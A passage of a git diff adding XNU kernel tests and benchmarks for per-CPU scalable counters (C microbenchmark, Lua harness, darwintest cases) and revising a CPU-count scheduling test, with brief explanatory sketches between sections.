+static const uint64_t kNumNanosecondsInSecond = kNumNanosecondsInMicrosecond * kNumMicrosecondsInSecond;
+/* Get a (wall-time) timestamp in nanoseconds */
+#define current_timestamp_ns() (clock_gettime_nsec_np(CLOCK_MONOTONIC_RAW));
+
+int get_ncpu(void);
+
+#endif /* !defined(BENCHMARK_PERF_HELPERS_H) */
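A minimal usage sketch for these helpers (not part of the commit; it assumes a small standalone binary compiled together with tests/benchmark/helpers.c):

#include <stdio.h>
#include "benchmark/helpers.h"

int
main(void)
{
	/* Map a 1 MiB anonymous buffer and time how long it takes to touch it. */
	size_t len = 1 << 20;
	unsigned char *buf = mmap_buffer(len);

	uint64_t start_ns = current_timestamp_ns();
	for (size_t i = 0; i < len; i++) {
		buf[i] = (unsigned char)i;
	}
	uint64_t end_ns = current_timestamp_ns();

	/* benchmark_log() only prints when verbose is true; get_ncpu() reads hw.ncpu. */
	benchmark_log(true, "touched %zu bytes on a %d-cpu machine in %llu ns\n",
	    len, get_ncpu(), (unsigned long long)(end_ns - start_ns));
	return 0;
}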
diff --git a/tests/counter/benchmark.c b/tests/counter/benchmark.c
new file mode 100644 (file)
index 0000000..32471d3
--- /dev/null
@@ -0,0 +1,243 @@
+/* Per-cpu counter microbenchmarks. */
+
+#include <assert.h>
+#include <inttypes.h>
+#include <pthread.h>
+#include <stdatomic.h>
+#include <stdbool.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+
+#include <sys/types.h>
+#include <sys/sysctl.h>
+
+#include "benchmark/helpers.h"
+#include "counter/common.h"
+
+typedef enum test_variant {
+       VARIANT_SCALABLE_COUNTER,
+       VARIANT_ATOMIC,
+       VARIANT_RACY
+} test_variant_t;
+
+static const char* kScalableCounterArgument = "scalable";
+static const char* kAtomicCounterArgument = "atomic";
+static const char* kRacyCounterArgument = "racy";
+
+static const int64_t kChunkSize = 100000000;
+
+/* Arguments parsed from the command line */
+typedef struct test_args {
+       size_t n_threads;
+       unsigned long long num_writes;
+       test_variant_t variant;
+       bool verbose;
+} test_args_t;
+
+typedef struct {
+       char _padding1[128];
+       atomic_bool tg_test_start;
+       atomic_ullong tg_num_writes_remaining;
+       atomic_ullong tg_threads_ready;
+       test_args_t tg_args;
+       uint64_t tg_start_time;
+       uint64_t tg_end_time;
+       uint64_t tg_start_value;
+       uint64_t tg_end_value;
+       char _padding2[128];
+} test_globals_t;
+
+static void parse_arguments(int argc, char** argv, test_args_t *args);
+static const char *get_sysctl_name_for_test_variant(test_variant_t variant);
+static void *writer(void *);
+static uint64_t counter_read(test_variant_t);
+
+int
+main(int argc, char** argv)
+{
+       test_globals_t globals = {0};
+       pthread_t* threads = NULL;
+       int ret;
+       int is_development_kernel;
+       size_t is_development_kernel_size = sizeof(is_development_kernel);
+       pthread_attr_t pthread_attrs;
+       uint64_t duration, writes_stored;
+       double writes_per_second;
+       double loss;
+
+       if (sysctlbyname("kern.development", &is_development_kernel,
+           &is_development_kernel_size, NULL, 0) != 0 || !is_development_kernel) {
+               fprintf(stderr, "%s requires the development kernel\n", argv[0]);
+               exit(1);
+       }
+
+       parse_arguments(argc, argv, &(globals.tg_args));
+       atomic_store(&(globals.tg_num_writes_remaining), globals.tg_args.num_writes);
+
+       threads = malloc(sizeof(pthread_t) * globals.tg_args.n_threads);
+       assert(threads);
+       ret = pthread_attr_init(&pthread_attrs);
+       assert(ret == 0);
+       ret = init_scalable_counter_test();
+       assert(ret == 0);
+       globals.tg_start_value = counter_read(globals.tg_args.variant);
+       for (size_t i = 0; i < globals.tg_args.n_threads; i++) {
+               ret = pthread_create(threads + i, &pthread_attrs, writer, &globals);
+               assert(ret == 0);
+       }
+       for (size_t i = 0; i < globals.tg_args.n_threads; i++) {
+               ret = pthread_join(threads[i], NULL);
+               assert(ret == 0);
+       }
+       ret = fini_scalable_counter_test();
+       assert(ret == 0);
+       globals.tg_end_value = counter_read(globals.tg_args.variant);
+
+       duration = globals.tg_end_time - globals.tg_start_time;
+       printf("-----Results-----\n");
+       printf("rate,loss\n");
+       writes_per_second = globals.tg_args.num_writes / ((double) duration / kNumNanosecondsInSecond);
+       writes_stored = globals.tg_end_value - globals.tg_start_value;
+       loss = (1.0 - ((double) writes_stored / globals.tg_args.num_writes)) * 100;
+       printf("%.4f,%.4f\n", writes_per_second, loss);
+       return 0;
+}
+
+static void *
+writer(void *arg)
+{
+       int ret;
+       const char* sysctl_name;
+       test_globals_t *globals = arg;
+       int64_t value = kChunkSize;
+       //size_t size = sizeof(value);
+
+       sysctl_name = get_sysctl_name_for_test_variant(globals->tg_args.variant);
+       assert(sysctl_name != NULL);
+
+       if (atomic_fetch_add(&(globals->tg_threads_ready), 1) == globals->tg_args.n_threads - 1) {
+               globals->tg_start_time = current_timestamp_ns();
+               atomic_store(&globals->tg_test_start, true);
+       }
+       while (!atomic_load(&(globals->tg_test_start))) {
+               ;
+       }
+
+       while (true) {
+               unsigned long long remaining = atomic_fetch_sub(&(globals->tg_num_writes_remaining), value);
+               if (remaining < kChunkSize || remaining > globals->tg_args.num_writes) {
+                       break;
+               }
+
+               ret = sysctlbyname(sysctl_name, NULL, NULL, &value, sizeof(value));
+               assert(ret == 0);
+               if (remaining == kChunkSize || remaining - kChunkSize > remaining) {
+                       break;
+               }
+       }
+
+       if (atomic_fetch_sub(&(globals->tg_threads_ready), 1) == 1) {
+               globals->tg_end_time = current_timestamp_ns();
+       }
+
+       return NULL;
+}
+
+static const char*
+get_sysctl_name_for_test_variant(test_variant_t variant)
+{
+       switch (variant) {
+       case VARIANT_SCALABLE_COUNTER:
+               return "kern.scalable_counter_write_benchmark";
+       case VARIANT_ATOMIC:
+               return "kern.scalable_counter_atomic_counter_write_benchmark";
+       case VARIANT_RACY:
+               return "kern.scalable_counter_racy_counter_benchmark";
+       default:
+               return NULL;
+       }
+}
+
+static const char*
+get_sysctl_load_name_for_test_variant(test_variant_t variant)
+{
+       switch (variant) {
+       case VARIANT_SCALABLE_COUNTER:
+               return "kern.scalable_counter_test_load";
+       case VARIANT_ATOMIC:
+               return "kern.scalable_counter_atomic_counter_load";
+       case VARIANT_RACY:
+               return "kern.scalable_counter_racy_counter_load";
+       default:
+               return NULL;
+       }
+}
+
+static uint64_t
+counter_read(test_variant_t variant)
+{
+       const char *sysctl_name = get_sysctl_load_name_for_test_variant(variant);
+       int result;
+       uint64_t value;
+       size_t size = sizeof(value);
+       result = sysctlbyname(sysctl_name, &value, &size, NULL, 0);
+       assert(result == 0);
+       return value;
+}
+
+static void
+print_help(char** argv)
+{
+       fprintf(stderr, "%s: [-v] <test-variant> num_writes num_threads\n", argv[0]);
+       fprintf(stderr, "\ntest variants:\n");
+       fprintf(stderr, "       %s      Benchmark scalable counters.\n", kScalableCounterArgument);
+       fprintf(stderr, "       %s      Benchmark single atomic counter.\n", kAtomicCounterArgument);
+       fprintf(stderr, "       %s      Benchmark racy counter.\n", kRacyCounterArgument);
+}
+
+static void
+parse_arguments(int argc, char** argv, test_args_t *args)
+{
+       int current_argument = 1;
+       memset(args, 0, sizeof(test_args_t));
+       if (argc < 4 || argc > 6) {
+               print_help(argv);
+               exit(1);
+       }
+       if (argv[current_argument][0] == '-') {
+               if (strcmp(argv[current_argument], "-v") == 0) {
+                       args->verbose = true;
+               } else {
+                       fprintf(stderr, "Unknown argument %s\n", argv[current_argument]);
+                       print_help(argv);
+                       exit(1);
+               }
+               current_argument++;
+       }
+       if (strncasecmp(argv[current_argument], kScalableCounterArgument, strlen(kScalableCounterArgument)) == 0) {
+               args->variant = VARIANT_SCALABLE_COUNTER;
+       } else if (strncasecmp(argv[current_argument], kAtomicCounterArgument, strlen(kAtomicCounterArgument)) == 0) {
+               args->variant = VARIANT_ATOMIC;
+       } else if (strncasecmp(argv[current_argument], kRacyCounterArgument, strlen(kRacyCounterArgument)) == 0) {
+               args->variant = VARIANT_RACY;
+       } else {
+               print_help(argv);
+               exit(1);
+       }
+       current_argument++;
+
+       long num_writes = strtol(argv[current_argument++], NULL, 10);
+       if (num_writes == 0) {
+               print_help(argv);
+               exit(1);
+       }
+       long num_cores = strtol(argv[current_argument++], NULL, 10);
+       if (num_cores == 0) {
+               print_help(argv);
+               exit(1);
+       }
+       assert(num_cores > 0 && num_cores <= get_ncpu());
+       args->n_threads = (unsigned int) num_cores;
+       args->num_writes = (unsigned long long) num_writes;
+}
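writer() above spreads the work by having each thread atomically claim kChunkSize (10^8) writes from the shared tg_num_writes_remaining budget and issue one sysctl per claimed chunk, so the default 10^10 writes become roughly 100 kernel calls split across the workers; an underflowed budget reads back larger than num_writes, which is how the guard catches over-claiming. A standalone, user-space sketch of that claim-a-chunk pattern (illustrative only; the totals and names below are made up):

#include <stdatomic.h>
#include <stdio.h>

#define TOTAL 1000000000ULL    /* hypothetical work budget */
#define CHUNK  100000000ULL    /* units claimed per iteration */

static atomic_ullong remaining = TOTAL;

/*
 * Claim CHUNK units at a time; stop once the budget is exhausted.
 * After an underflow the counter wraps to a value larger than TOTAL,
 * so concurrent claimers also notice that the budget is gone.
 */
static unsigned long long
claim_chunks(void)
{
	unsigned long long claimed = 0;
	for (;;) {
		unsigned long long before = atomic_fetch_sub(&remaining, CHUNK);
		if (before < CHUNK || before > TOTAL) {
			break;
		}
		claimed += CHUNK;
		/* ... perform CHUNK units of work here ... */
	}
	return claimed;
}

int
main(void)
{
	printf("claimed %llu of %llu units\n", claim_chunks(), (unsigned long long)TOTAL);
	return 0;
}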
diff --git a/tests/counter/benchmark.lua b/tests/counter/benchmark.lua
new file mode 100644 (file)
index 0000000..2759e87
--- /dev/null
@@ -0,0 +1,107 @@
+#!/usr/local/bin/recon
+require 'strict'
+
+local benchrun = require 'benchrun'
+local perfdata = require 'perfdata'
+local sysctl = require 'sysctl'
+local csv = require 'csv'
+
+local kDefaultNumWrites = 10000000000
+
+local benchmark = benchrun.new {
+    name = 'xnu.per_cpu_counter',
+    version = 1,
+    arg = arg,
+    modify_argparser = function(parser)
+        parser:argument{
+          name = 'path',
+          description = 'Path to benchmark binary'
+        }
+        parser:option{
+            name = '--cpu-workers',
+            description = 'Number of cpu workers'
+        }
+        parser:flag{
+          name = '--through-max-workers',
+          description = 'Run benchmark for [1..n] cpu workers'
+        }
+        parser:flag{
+          name = '--through-max-workers-fast',
+          description = 'Run benchmark for [1..2] and each power of four value in [4..n] cpu workers'
+        }
+        parser:option {
+            name = "--num-writes",
+            description = "number of writes",
+            default = kDefaultNumWrites
+        }
+        parser:option{
+            name = '--variant',
+            description = 'Which benchmark variant to run (scalable, atomic, or racy)',
+            default = 'scalable',
+            choices = {"scalable", "atomic", "racy"}
+        }
+    end
+}
+
+assert(benchmark.opt.path, "No path supplied for counter benchmark binary")
+
+local ncpus, err = sysctl('hw.logicalcpu_max')
+assert(ncpus > 0, 'invalid number of logical cpus')
+local cpu_workers = tonumber(benchmark.opt.cpu_workers) or ncpus
+
+local writes_per_second = perfdata.unit.custom('writes/sec')
+-- unit for the loss column; referenced below and required under strict mode
+local percentage = perfdata.unit.custom('%')
+local tests = {}
+
+function QueueTest(num_cores)
+    table.insert(tests, {
+        path = benchmark.opt.path,
+        num_cores = num_cores,
+    })
+end
+
+if benchmark.opt.through_max_workers then
+    for i = 1, cpu_workers do
+        QueueTest(i)
+    end
+elseif benchmark.opt.through_max_workers_fast then
+    local i = 1
+    while i <= cpu_workers do
+        QueueTest(i)
+        -- Always do a run with two threads to see what the first part of
+        -- the scaling curve looks like
+        -- (and to measure perf on dual core systems).
+        if i == 1 and cpu_workers >= 2 then
+            QueueTest(i + 1)
+        end
+        i = i * 4
+    end
+else
+    QueueTest(cpu_workers)
+end
+
+for _, test in ipairs(tests) do
+    local args = {test.path, benchmark.opt.variant, benchmark.opt.num_writes, test.num_cores,
+                     echo = true}
+    for out in benchmark:run(args) do
+        local result = out:match("-----Results-----\n(.*)")
+        benchmark:assert(result, "Unable to find result data in output")
+        local data = csv.openstring(result, {header = true})
+        for field in data:lines() do
+            for k, v in pairs(field) do
+                local unit = writes_per_second
+                local larger_better = true
+                if k == "loss" then
+                    unit = percentage
+                    larger_better = false
+                end
+                benchmark.writer:add_value(k, unit, tonumber(v), {
+                  [perfdata.larger_better] = larger_better,
+                  threads = test.num_cores,
+                  variant = benchmark.opt.variant
+                })
+            end
+        end
+    end
+end
+
+benchmark:finish()
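The contract between this harness and the C binary is just the text printed after "-----Results-----": a "rate,loss" header followed by one CSV row. A hedged sketch of parsing such a row outside the recon/benchrun harness (the sample values are invented):

#include <stdio.h>

int
main(void)
{
	/* One data row in the shape emitted by counter/benchmark.c. */
	const char *row = "48123456.7890,0.0123";
	double writes_per_second = 0.0;
	double loss_pct = 0.0;

	if (sscanf(row, "%lf,%lf", &writes_per_second, &loss_pct) == 2) {
		printf("rate=%.4f writes/sec, loss=%.4f%%\n", writes_per_second, loss_pct);
	}
	return 0;
}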
diff --git a/tests/counter/common.c b/tests/counter/common.c
new file mode 100644 (file)
index 0000000..f759f29
--- /dev/null
@@ -0,0 +1,24 @@
+#include <sys/types.h>
+#include <sys/sysctl.h>
+#include <sys/kern_sysctl.h>
+
+#include "counter/common.h"
+
+int
+init_scalable_counter_test()
+{
+       kern_return_t result;
+       int value = 1;
+
+       result = sysctlbyname("kern.scalable_counter_test_start", NULL, NULL, &value, sizeof(value));
+       return result;
+}
+
+int
+fini_scalable_counter_test()
+{
+       kern_return_t result;
+       int value = 1;
+       result = sysctlbyname("kern.scalable_counter_test_finish", NULL, NULL, &value, sizeof(value));
+       return result;
+}
diff --git a/tests/counter/common.h b/tests/counter/common.h
new file mode 100644 (file)
index 0000000..eaf4daa
--- /dev/null
@@ -0,0 +1,7 @@
+#ifndef _COUNTER_COMMON_H
+#define _COUNTER_COMMON_H
+
+int init_scalable_counter_test(void);
+int fini_scalable_counter_test(void);
+
+#endif /* !defined(_COUNTER_COMMON_H) */
diff --git a/tests/counter/counter.c b/tests/counter/counter.c
new file mode 100644 (file)
index 0000000..8000b08
--- /dev/null
@@ -0,0 +1,181 @@
+#include <stdatomic.h>
+#include <sys/kern_sysctl.h>
+
+#include <darwintest_utils.h>
+#include <darwintest.h>
+
+#include "counter/common.h"
+#include "test_utils.h"
+
+static unsigned int ncpu(void);
+
+static uint64_t
+sysctl_read(const char *name)
+{
+       int result;
+       uint64_t value;
+       size_t size = sizeof(value);
+       result = sysctlbyname(name, &value, &size, NULL, 0);
+       T_QUIET; T_ASSERT_POSIX_SUCCESS(result, "Read from %s", name);
+       return value;
+}
+
+static void
+sysctl_write(const char* name, int64_t amount)
+{
+       kern_return_t result;
+       result = sysctlbyname(name, NULL, NULL, &amount, sizeof(int64_t));
+       T_QUIET; T_ASSERT_POSIX_SUCCESS(result, "Write to %s", name);
+}
+
+static void
+scalable_counter_add(int64_t amount)
+{
+       sysctl_write("kern.scalable_counter_test_add", amount);
+}
+
+static void
+static_scalable_counter_add(int64_t amount)
+{
+       sysctl_write("kern.static_scalable_counter_test_add", amount);
+}
+
+static int64_t
+scalable_counter_load(void)
+{
+       return (int64_t) sysctl_read("kern.scalable_counter_test_load");
+}
+
+static int64_t
+static_scalable_counter_load(void)
+{
+       return (int64_t) sysctl_read("kern.static_scalable_counter_test_load");
+}
+
+/*
+ * A background thread that bangs on the percpu counter and then exits.
+ * @param num_iterations How many times to bang on the counter. Each iteration makes the counter
+ * bigger by 100 (the four adds net -25 + 75 - 100 + 150 = +100).
+ */
+static void*
+background_scalable_counter_thread(void* num_iterations_ptr)
+{
+       int64_t i, num_iterations;
+       num_iterations = (int64_t)(num_iterations_ptr);
+       for (i = 0; i < num_iterations; i++) {
+               scalable_counter_add(-25);
+               scalable_counter_add(75);
+               scalable_counter_add(-100);
+               scalable_counter_add(150);
+       }
+       atomic_thread_fence(memory_order_release);
+       return 0;
+}
+
+static
+void
+darwin_test_fini_scalable_counter_test()
+{
+       int ret = fini_scalable_counter_test();
+       T_QUIET; T_ASSERT_POSIX_SUCCESS(ret, "fini_scalable_counter_test");
+}
+
+static
+void
+darwin_test_setup(void)
+{
+       T_SETUPBEGIN;
+       int dev_kernel = is_development_kernel();
+       T_QUIET; T_ASSERT_POSIX_SUCCESS(dev_kernel, "sysctlbyname kern.development");
+       if (is_development_kernel() != 1) {
+               T_SKIP("Skipping test on non-development kernel.");
+       }
+       init_scalable_counter_test();
+       T_SETUPEND;
+       T_ATEND(darwin_test_fini_scalable_counter_test);
+}
+
+T_DECL(test_scalable_counters_single_threaded, "Test single threaded operations on scalable_counters", T_META_ASROOT(true))
+{
+       static int64_t kNumIterations = 100, i, expected_value = 0;
+       darwin_test_setup();
+       T_QUIET; T_EXPECT_EQ(scalable_counter_load(), 0LL, "Counter starts at zero");
+
+       /* Simple add, subtract, and read */
+       scalable_counter_add(1);
+       T_QUIET; T_EXPECT_EQ(scalable_counter_load(), 1LL, "0 + 1 == 1");
+       scalable_counter_add(-1);
+       T_QUIET; T_EXPECT_EQ(scalable_counter_load(), 0LL, "1 - 1 == 0");
+       for (i = 0; i < kNumIterations; i++) {
+               scalable_counter_add(i);
+               expected_value += i;
+       }
+       for (i = 0; i < kNumIterations / 2; i++) {
+               scalable_counter_add(-i);
+               expected_value -= i;
+       }
+       T_QUIET; T_EXPECT_EQ(scalable_counter_load(), expected_value, "Counter value is correct.");
+       T_END;
+}
+
+T_DECL(test_static_counter, "Test statically declared counter", T_META_ASROOT(true))
+{
+       static size_t kNumIterations = 100;
+       int64_t start_value;
+       darwin_test_setup();
+       start_value = static_scalable_counter_load();
+       for (size_t i = 0; i < kNumIterations; i++) {
+               static_scalable_counter_add(1);
+       }
+       T_QUIET; T_EXPECT_EQ(static_scalable_counter_load(), (long long) kNumIterations + start_value, "Counter value is correct");
+       T_END;
+}
+
+T_DECL(test_scalable_counters_multithreaded, "Test multi-threaded operations on scalable_counters", T_META_ASROOT(true))
+{
+       unsigned int kNumThreads = ncpu() * 5;
+       int ret;
+       int64_t i;
+       pthread_attr_t pthread_attr;
+       pthread_t *threads;
+
+       darwin_test_setup();
+
+       threads = malloc(sizeof(pthread_t) * kNumThreads);
+       T_QUIET; T_ASSERT_NOTNULL(threads, "Out of memory");
+
+       ret = pthread_attr_init(&pthread_attr);
+       T_QUIET; T_ASSERT_POSIX_SUCCESS(ret, "pthread_attr_init");
+
+       int64_t expected_value = 0;
+       for (i = 0; i < kNumThreads; i++) {
+               ret = pthread_create(&threads[i], &pthread_attr, background_scalable_counter_thread, (void*)(i));
+               T_QUIET; T_ASSERT_POSIX_SUCCESS(ret, "pthread_create");
+               expected_value += 100 * i;
+       }
+
+       for (i = 0; i < kNumThreads; i++) {
+               void *exit_code;
+               ret = pthread_join(threads[i], &exit_code);
+               T_QUIET; T_ASSERT_POSIX_SUCCESS(ret, "pthread_join");
+               T_QUIET; T_ASSERT_EQ((ptrdiff_t) exit_code, (ptrdiff_t) 0, "Background thread exited successfully.");
+       }
+       atomic_thread_fence(memory_order_acquire);
+
+       T_QUIET; T_EXPECT_EQ(scalable_counter_load(), expected_value, "Counter value is correct.");
+
+       ret = pthread_attr_destroy(&pthread_attr);
+       T_QUIET; T_ASSERT_POSIX_SUCCESS(ret, "pthread_attr_destroy");
+       free(threads);
+}
+
+static unsigned int
+ncpu()
+{
+       kern_return_t result;
+       int ncpu;
+       size_t size = sizeof(ncpu);
+       result = sysctlbyname("hw.ncpu", &ncpu, &size, NULL, 0);
+       T_QUIET; T_ASSERT_MACH_SUCCESS(result, "hw.ncpu");
+       return (unsigned int) ncpu;
+}
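For intuition, the per-CPU ("scalable") counters these sysctls exercise keep one value per CPU and sum the values on read; a rough user-space analogue, not the kernel implementation, is a set of cache-line-padded slots (the slot count and padding below are illustrative):

#include <stdatomic.h>
#include <stdio.h>

#define NSLOTS 8        /* stand-in for "one slot per CPU" */

/* Pad each slot to its own cache line so writers on different slots don't contend. */
struct slot {
	_Alignas(128) atomic_llong value;
};

static struct slot slots[NSLOTS];

static void
counter_add(unsigned int slot_hint, long long amount)
{
	/* Relaxed ordering is enough here: only the eventual sum matters. */
	atomic_fetch_add_explicit(&slots[slot_hint % NSLOTS].value, amount,
	    memory_order_relaxed);
}

static long long
counter_read(void)
{
	long long sum = 0;
	for (int i = 0; i < NSLOTS; i++) {
		sum += atomic_load_explicit(&slots[i].value, memory_order_relaxed);
	}
	return sum;
}

int
main(void)
{
	for (unsigned int i = 0; i < 1000; i++) {
		counter_add(i, 1);
	}
	printf("total = %lld\n", counter_read());
	return 0;
}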
index 24a2c156cb99d6c42262c66884d07c1f686d213c..0906ab7fc801edac90c76e5760feed438db332b8 100644 (file)
  * Test to validate that we can schedule threads on all hw.ncpus cores according to _os_cpu_number
  *
  * <rdar://problem/29545645>
+ * <rdar://problem/30445216>
  *
  *  xcrun -sdk macosx.internal clang -o cpucount cpucount.c -ldarwintest -g -Weverything
  *  xcrun -sdk iphoneos.internal clang -arch arm64 -o cpucount-ios cpucount.c -ldarwintest -g -Weverything
+ *  xcrun -sdk macosx.internal clang -o cpucount cpucount.c -ldarwintest -arch arm64e -Weverything
  */
 
 #include <darwintest.h>
 
 #include <stdio.h>
 #include <stdlib.h>
-#include <stdbool.h>
-#include <stdalign.h>
 #include <unistd.h>
-#include <assert.h>
 #include <pthread.h>
-#include <err.h>
-#include <errno.h>
-#include <sysexits.h>
 #include <sys/sysctl.h>
-#include <stdatomic.h>
+#include <sys/proc_info.h>
+#include <libproc.h>
 
 #include <mach/mach.h>
 #include <mach/mach_time.h>
 
 #include <os/tsd.h> /* private header for _os_cpu_number */
 
-T_GLOBAL_META(T_META_RUN_CONCURRENTLY(true));
+T_GLOBAL_META(
+       T_META_RUN_CONCURRENTLY(false),
+       T_META_BOOTARGS_SET("enable_skstb=1"),
+       T_META_CHECK_LEAKS(false),
+       T_META_ASROOT(true),
+       T_META_ALL_VALID_ARCHS(true)
+       );
 
-/* const variables aren't constants, but enums are */
-enum { max_threads = 40 };
+#define KERNEL_BOOTARGS_MAX_SIZE 1024
+static char kernel_bootargs[KERNEL_BOOTARGS_MAX_SIZE];
 
-#define CACHE_ALIGNED __attribute__((aligned(128)))
-
-static _Atomic CACHE_ALIGNED uint64_t g_ready_threads = 0;
-
-static _Atomic CACHE_ALIGNED bool g_cpu_seen[max_threads];
-
-static _Atomic CACHE_ALIGNED bool g_bail = false;
-
-static uint32_t g_threads; /* set by sysctl hw.ncpu */
-
-static uint64_t g_spin_ms = 50; /* it takes ~50ms of spinning for CLPC to deign to give us all cores */
-
-/*
- * sometimes pageout scan can eat all of CPU 0 long enough to fail the test,
- * so we run the test at RT priority
- */
-static uint32_t g_thread_pri = 97;
-
-/*
- * add in some extra low-pri threads to convince the amp scheduler to use E-cores consistently
- * works around <rdar://problem/29636191>
- */
-static uint32_t g_spin_threads = 2;
-static uint32_t g_spin_threads_pri = 20;
-
-static semaphore_t g_readysem, g_go_sem;
+#define KERNEL_VERSION_MAX_SIZE 1024
+static char kernel_version[KERNEL_VERSION_MAX_SIZE];
 
 static mach_timebase_info_data_t timebase_info;
 
 static uint64_t
-nanos_to_abs(uint64_t nanos)
+abs_to_nanos(uint64_t abs)
 {
-       return nanos * timebase_info.denom / timebase_info.numer;
+       return abs * timebase_info.numer / timebase_info.denom;
 }
 
-static void
-set_realtime(pthread_t thread)
-{
-       kern_return_t kr;
-       thread_time_constraint_policy_data_t pol;
-
-       mach_port_t target_thread = pthread_mach_thread_np(thread);
-       T_QUIET; T_ASSERT_NOTNULL(target_thread, "pthread_mach_thread_np");
-
-       /* 1s 100ms 10ms */
-       pol.period      = (uint32_t)nanos_to_abs(1000000000);
-       pol.constraint  = (uint32_t)nanos_to_abs(100000000);
-       pol.computation = (uint32_t)nanos_to_abs(10000000);
-
-       pol.preemptible = 0; /* Ignored by OS */
-       kr = thread_policy_set(target_thread, THREAD_TIME_CONSTRAINT_POLICY, (thread_policy_t) &pol,
-           THREAD_TIME_CONSTRAINT_POLICY_COUNT);
-       T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "thread_policy_set(THREAD_TIME_CONSTRAINT_POLICY)");
-}
-
-static pthread_t
-create_thread(void *(*start_routine)(void *), uint32_t priority)
+static int32_t
+get_csw_count()
 {
+       struct proc_taskinfo taskinfo;
        int rv;
-       pthread_t new_thread;
-       pthread_attr_t attr;
-
-       struct sched_param param = { .sched_priority = (int)priority };
-
-       rv = pthread_attr_init(&attr);
-       T_QUIET; T_ASSERT_POSIX_SUCCESS(rv, "pthread_attr_init");
-
-       rv = pthread_attr_setdetachstate(&attr, PTHREAD_CREATE_DETACHED);
-       T_QUIET; T_ASSERT_POSIX_SUCCESS(rv, "pthread_attr_setdetachstate");
-
-       rv = pthread_attr_setschedparam(&attr, &param);
-       T_QUIET; T_ASSERT_POSIX_SUCCESS(rv, "pthread_attr_setschedparam");
-
-       rv = pthread_create(&new_thread, &attr, start_routine, NULL);
-       T_QUIET; T_ASSERT_POSIX_SUCCESS(rv, "pthread_create");
-
-       if (priority == 97) {
-               set_realtime(new_thread);
-       }
 
-       rv = pthread_attr_destroy(&attr);
-       T_QUIET; T_ASSERT_POSIX_SUCCESS(rv, "pthread_attr_destroy");
+       rv = proc_pidinfo(getpid(), PROC_PIDTASKINFO, 0, &taskinfo, sizeof(taskinfo));
+       T_QUIET; T_ASSERT_POSIX_SUCCESS(rv, "PROC_PIDTASKINFO");
 
-       return new_thread;
+       return taskinfo.pti_csw;
 }
 
-static void *
-thread_fn(__unused void *arg)
+// noinline hopefully keeps the optimizer from hoisting it out of the loop
+// until rdar://68253516 is fixed.
+__attribute__((noinline))
+static uint32_t
+fixed_os_cpu_number(void)
 {
-       T_QUIET; T_EXPECT_TRUE(true, "initialize darwintest on this thread");
-
-       kern_return_t kr;
-
-       kr = semaphore_wait_signal(g_go_sem, g_readysem);
-       T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "semaphore_wait_signal");
+       uint32_t cpu_number = _os_cpu_number();
 
-       /* atomic inc to say hello */
-       g_ready_threads++;
+       return cpu_number;
+}
 
-       uint64_t timeout = nanos_to_abs(g_spin_ms * NSEC_PER_MSEC) + mach_absolute_time();
 
-       /*
-        * spin to force the other threads to spread out across the cores
-        * may take some time if cores are masked and CLPC needs to warm up to unmask them
-        */
-       while (g_ready_threads < g_threads && mach_absolute_time() < timeout) {
-               ;
-       }
+T_DECL(count_cpus, "Tests we can schedule bound threads on all hw.ncpus cores and that _os_cpu_number matches")
+{
+       int rv;
 
-       T_QUIET; T_ASSERT_GE(timeout, mach_absolute_time(), "waiting for all threads took too long");
+       setvbuf(stdout, NULL, _IONBF, 0);
+       setvbuf(stderr, NULL, _IONBF, 0);
 
-       timeout = nanos_to_abs(g_spin_ms * NSEC_PER_MSEC) + mach_absolute_time();
+       /* Validate what kind of kernel we're on */
+       size_t kernel_version_size = sizeof(kernel_version);
+       rv = sysctlbyname("kern.version", kernel_version, &kernel_version_size, NULL, 0);
+       T_QUIET; T_ASSERT_POSIX_SUCCESS(rv, "kern.version");
 
-       int iteration = 0;
-       uint32_t cpunum = 0;
+       T_LOG("kern.version: %s\n", kernel_version);
 
-       /* search for new CPUs for the duration */
-       while (mach_absolute_time() < timeout) {
-               cpunum = _os_cpu_number();
+       /* Double check that darwintest set the boot arg we requested */
+       size_t kernel_bootargs_size = sizeof(kernel_bootargs);
+       rv = sysctlbyname("kern.bootargs", kernel_bootargs, &kernel_bootargs_size, NULL, 0);
+       T_QUIET; T_ASSERT_POSIX_SUCCESS(rv, "kern.bootargs");
 
-               assert(cpunum < max_threads);
+       T_LOG("kern.bootargs: %s\n", kernel_bootargs);
 
-               g_cpu_seen[cpunum] = true;
+       if (NULL == strstr(kernel_bootargs, "enable_skstb=1")) {
+               T_FAIL("enable_skstb=1 boot-arg is missing");
+       }
 
-               if (iteration++ % 10000) {
-                       uint32_t cpus_seen = 0;
+       kern_return_t kr;
+       kr = mach_timebase_info(&timebase_info);
+       T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "mach_timebase_info");
 
-                       for (uint32_t i = 0; i < g_threads; i++) {
-                               if (g_cpu_seen[i]) {
-                                       cpus_seen++;
-                               }
-                       }
+       int bound_cpu_out = 0;
+       size_t bound_cpu_out_size = sizeof(bound_cpu_out);
+       rv = sysctlbyname("kern.sched_thread_bind_cpu", &bound_cpu_out, &bound_cpu_out_size, NULL, 0);
 
-                       /* bail out early if we saw all CPUs */
-                       if (cpus_seen == g_threads) {
-                               break;
-                       }
+       if (rv == -1) {
+               if (errno == ENOENT) {
+                       T_FAIL("kern.sched_thread_bind_cpu doesn't exist, must set enable_skstb=1 boot-arg on development kernel");
+               }
+               if (errno == EPERM) {
+                       T_FAIL("must run as root");
                }
        }
 
-       g_bail = true;
+       T_QUIET; T_ASSERT_POSIX_SUCCESS(rv, "read kern.sched_thread_bind_cpu");
+       T_QUIET; T_ASSERT_EQ(bound_cpu_out, -1, "kern.sched_thread_bind_cpu should exist, start unbound");
 
-       printf("thread cpunum: %d\n", cpunum);
+       struct sched_param param = {.sched_priority = 63};
 
-       kr = semaphore_wait_signal(g_go_sem, g_readysem);
-       T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "semaphore_wait_signal");
+       rv = pthread_setschedparam(pthread_self(), SCHED_FIFO, &param);
+       T_QUIET; T_ASSERT_POSIX_SUCCESS(rv, "pthread_setschedparam");
 
-       return NULL;
-}
+       uint32_t sysctl_ncpu = 0;
+       size_t ncpu_size = sizeof(sysctl_ncpu);
+       rv = sysctlbyname("hw.ncpu", &sysctl_ncpu, &ncpu_size, NULL, 0);
+       T_QUIET; T_ASSERT_POSIX_SUCCESS(rv, "sysctlbyname(hw.ncpu)");
 
-static void *
-spin_fn(__unused void *arg)
-{
-       T_QUIET; T_EXPECT_TRUE(true, "initialize darwintest on this thread");
